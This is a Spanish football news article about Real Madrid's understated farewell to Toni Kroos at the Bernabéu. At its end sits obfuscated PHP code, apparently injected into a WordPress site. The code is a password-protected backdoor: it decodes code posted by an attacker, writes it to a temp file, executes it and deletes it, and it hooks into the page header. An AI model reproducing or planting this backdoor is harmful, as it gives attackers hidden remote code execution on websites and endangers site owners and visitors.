Homenaje sí, pero modesto

El Madrid quería organizar algo especial para despedir a Kroos en el Bernabéu, pero el alemán prefiere un acto sobrio y sin estridencias. Habrá tifo y mensaje del speaker.

El sábado, a las nueve de la noche, empezará a rodar el balón en el Bernabéu. Y aunque el partido es intrascendente en lo deportivo, con la Liga resuelta para Real Madrid y Betis, la noche pasará a la historia de la entidad blanca. Es el último partido de Toni Kroos, el hombre de los 34.000 pases, en el Santiago Bernabéu. Un mito del Real Madrid se despide de la afición. Una noche mágica en la que además el alemán superará los 463 partidos de Butragueño en el club y podría llegar a las 300 victorias y, sobre todo, dejará una huella imborrable y muy difícil de igualar.

El club ha estado intentando estos últimos días convencer a Kroos para convertir el encuentro en un homenaje a la altura de lo que el jugador se merece. Para el Madrid es un día de ‘Kroos y diez más’. Sin embargo, el mediocentro, fiel a su estilo, se ha querido quitar importancia y ha dado instrucciones para que lo que se haga tenga un carácter algo íntimo y sin estridencias. De este modo, dentro de lo que se ha podido organizar de antemano, habrá un tifo especial que se expandirá desde la grada de animación y un mensaje programado del speaker cuando Kroos sea cambiado al final del partido. Algo sobrio y modesto, como ha querido el futbolista.

Será una manifestación espontánea de la afición, por tanto, la encargada de calentar el ambiente. Para la despedida de Kroos se colgó el cartel de no hay billetes desde hace ya unos días, a pesar de que el encuentro es intrascendente en lo deportivo. Ya después del partido y de las ruedas de prensa, una vez que los jugadores hayan terminado su trabajo, en el vestuario tras el enfrentamiento ante el Betis, el club le realizará un homenaje a Kroos, pero será de puertas para adentro, sin cámaras.

Será una noche mágica pero sobria, como ha querido Kroos, aunque el alemán puede tener una ocasión más para despedirse de la afición. Será si el Real Madrid sale campeón de la final de Wembley ante el Borussia. En ese caso, el club organizará una nueva rúa y otro acto en Cibeles, donde Kroos sería gran protagonista, ganador de seis Copas de Europa (como Gento, Modric, Carvajal y Nacho) y gran Arquitecto del fútbol del Real Madrid durante los últimos diez años.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}